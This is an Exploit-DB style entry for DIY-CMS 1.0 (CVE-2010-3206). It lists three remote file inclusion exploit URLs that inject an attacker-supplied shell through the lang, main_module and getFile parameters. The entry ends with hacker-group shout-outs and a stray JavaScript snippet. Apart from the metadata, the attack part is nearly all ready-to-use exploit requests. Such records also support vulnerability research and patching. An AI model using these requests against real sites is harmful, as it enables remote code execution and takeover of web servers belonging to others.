DIY-CMS 1.0 - Multiple Remote File Inclusions

Author: LoSt.HaCkEr
type: webapps
platform: php
port: 
date_added: 2010-08-28 
date_updated: 2016-12-06 
verified: 0 
codes: CVE-2010-3206;OSVDB-67803;OSVDB-67802;OSVDB-67801 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdiycms_v1.0.rar

# Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ]
# Date: [28-8-2010]
# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
# Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html]
# Version: [v 1.0 ]
# Tested on: [Windows XP]
# CVE : Hacker town of Musayyib
#Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ aDaM_TRoJaN@yahoo.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit: http://target/diycms_v1.0/diycms_v1.0/modules/guestbook/blocks/control.block.php?lang=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Exploit: http://target/diycms_v1.0/diycms_v1.0/index.php?main_module=[ShEll]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Exploit: http://target/diycms_v1.0/diycms_v1.0/includes/general.functions.php?getFile=[SHELL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

		function toggle(obj) {
			var el = document.getElementById(obj);
			el.style.display = (el.style.display != 'none' ? 'none' : 'block' );
		}